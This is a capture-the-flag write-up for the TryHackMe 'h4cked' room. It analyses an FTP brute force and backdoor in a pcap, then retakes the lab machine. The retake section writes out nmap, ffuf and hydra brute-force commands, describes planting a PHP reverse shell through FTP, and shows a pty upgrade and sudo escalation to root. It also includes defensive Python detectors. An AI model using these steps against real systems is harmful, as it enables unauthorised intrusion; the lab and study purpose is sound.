h4cked — TryHackMe

h4cked-THM

Find out what happened by analyzing a .pcap file and hack your way back into the machine. This is a beginner-friendly room and can be found here:

https://tryhackme.com/room/h4cked

The attacker is trying to log into a specific service. What service is this?

Open Wireshark and notice that the service the attacker is trying to log in to is FTP. The following steps reveal the username and password asked about in later questions: select the first FTP packet, then right-click and choose Follow -> TCP Stream.

[screenshot: Wireshark, Follow TCP Stream on the FTP traffic]

There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

Hydra

The attacker is trying to log on with a specific username. What is the username?

Answered above

What is the user’s password?

Answered above

What is the current FTP working directory after the attacker logged in?

Clear the filter applied earlier and go to packet number 401, which is just after the successful FTP login. This packet shows the current FTP working directory.
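The stream analysis above can be automated. The following is an added example, not code from the original write-up: a small Python detector that takes an FTP control-channel transcript in the shape Wireshark's Follow TCP Stream shows, pairs each USER/PASS with the server's 230/530 reply, records the working directory returned after login, and flags a success that follows repeated failures, the signature of a Hydra-style dictionary attack. The transcript, the "->"/"<-" direction markers, the passwords and the directory are all constructed.

```python
import re
# Constructed transcript in the shape of Wireshark's "Follow TCP Stream";
# "->" = client, "<-" = server is our own marker. Values are made up.
SAMPLE_STREAM = """\
<- 220 FTP server ready
-> USER jenny
-> PASS 123456
<- 530 Login incorrect.
-> USER jenny
-> PASS password
<- 530 Login incorrect.
-> USER jenny
-> PASS example-pass
<- 230 Login successful.
-> PWD
<- 257 "/srv/ftp" is the current directory
"""

def parse_stream(stream):
    """Return ([(user, password, success), ...], cwd_after_login)."""
    attempts, user, password, cwd = [], None, None, None
    for line in stream.splitlines():
        direction, _, text = line.partition(" ")
        if direction == "->":
            verb, _, arg = text.partition(" ")
            if verb.upper() == "USER":
                user = arg.strip()
            elif verb.upper() == "PASS":
                password = arg.strip()
        elif direction == "<-":
            code = text[:3]
            if code in ("230", "530") and user and password is not None:
                attempts.append((user, password, code == "230"))
                password = None            # next PASS starts a fresh attempt
            elif code == "257":            # reply to PWD: the working directory
                m = re.search(r'"([^"]*)"', text)
                cwd = m.group(1) if m else None
    return attempts, cwd

def detect_bruteforce(attempts, threshold=2):
    """Alert on a successful login preceded by >= threshold failures for that user."""
    failures, alerts = {}, []
    for user, password, success in attempts:
        if success:
            if failures.get(user, 0) >= threshold:
                alerts.append((user, password, failures[user]))
        else:
            failures[user] = failures.get(user, 0) + 1
    return alerts
```

Hydra normally opens a new TCP connection per guess, so in a real capture the attempts are spread over many streams; feed the detector the concatenated streams rather than a single one.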

[screenshot: Wireshark, packet 401 showing the FTP working directory]

The attacker uploaded a backdoor. What is the backdoor’s filename?

Check packet no. 425 in Capture.pcapng.

The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

It is the well-known PHP reverse shell from pentestmonkey. Check packet no. 431.

Which command did the attacker manually execute after getting a reverse shell?

Select packet no. 452, then right-click -> Follow -> TCP Stream. This reveals what the attacker did on the target after getting the shell.

This also tells us the computer's hostname, the command the attacker executed to spawn a new TTY shell, the command executed to gain a root shell, and what the attacker downloaded from GitHub.

The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

Browse to the GitHub project found in the last question; its About section gives the type of backdoor that was used.

Hack your way back into the machine

Run a quick Nmap scan to check what services are running on the target:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 10.10.43.233
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

So two services are running. The attacker has also changed the user's password, so we need to replicate the attacker's steps and read flag.txt, which is located in the /root/Reptile directory.

First, brute-force directories and files on port 80 using ffuf:

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.43.233/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://10.10.43.233/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
shell.php [Status: 200, Size: 143, Words: 20, Lines: 3]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 10918, Words: 3499, Lines: 376]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 1854 req/sec :: Duration: [0:09:13] :: Errors: 0 ::

We can see shell.php, which gives us RCE on the server. Now use Hydra to brute-force the FTP password for the user "jenny":

hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.43.233

[screenshot: Hydra output for the FTP brute force]

Hydra finds it very quickly in rockyou.txt. Log in to the target via FTP using the credentials we now know:

[screenshot: FTP login as jenny]

Because shell.php has read, write and execute permissions for everyone, "get" shell.php onto the local machine, edit it with the IP address of the local machine and a port of your choice so that we get a reverse shell back, then "put" the file back. Start a netcat listener on the local machine and execute shell.php via the browser:
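The condition that made this possible, a world-writable script in the web root that any FTP user can overwrite, is easy to audit. The following is an added example, not code from the write-up: a Python check that walks a web root and lists script files with the other-write bit set; demo() builds a constructed temporary web root instead of touching the room's machine.

```python
import os
import stat
import tempfile

# Extensions the web server would execute as code; extend for your stack.
SCRIPT_SUFFIXES = (".php", ".phtml")

def world_writable_scripts(webroot):
    """Paths under webroot that the web server executes as code and that any
    local account (for example an FTP user) can overwrite: the shell.php
    condition the attacker relied on. Returns paths relative to webroot."""
    findings = []
    for dirpath, _dirs, names in os.walk(webroot):
        for name in names:
            if not name.lower().endswith(SCRIPT_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode          # lstat: do not follow symlinks
            if stat.S_ISREG(mode) and mode & stat.S_IWOTH:
                findings.append(os.path.relpath(path, webroot))
    return sorted(findings)

def demo():
    """Build a constructed web root (not the room's machine) and audit it."""
    root = tempfile.mkdtemp()
    # shell.php mirrors the write-up's rwx-for-everyone file; the others
    # are controls that must not be reported.
    files = {"shell.php": 0o777, "ok.php": 0o644, "notes.txt": 0o666}
    for name, mode in files.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("<?php /* constructed sample */ ?>\n")
        os.chmod(path, mode)
    return world_writable_scripts(root)

if __name__ == "__main__":
    print(demo())   # ['shell.php']
```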

[screenshot: executing shell.php from the browser]

We got our reverse shell:

[screenshot: reverse shell received on the netcat listener]

Run the following to upgrade the current shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Switch user to jenny using the same password found with Hydra:

su jenny

Check what jenny can run as other users (again, use the same password):

sudo -l

[screenshot: sudo -l output for jenny]

User jenny can run any command as root, so just use sudo su to get root:

[screenshot: sudo su giving a root shell]

Find the root flag at /root/Reptile/flag.txt.

That’s it. Thanks for reading.

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs: Security+, PenTest+, AZ900
0xsanz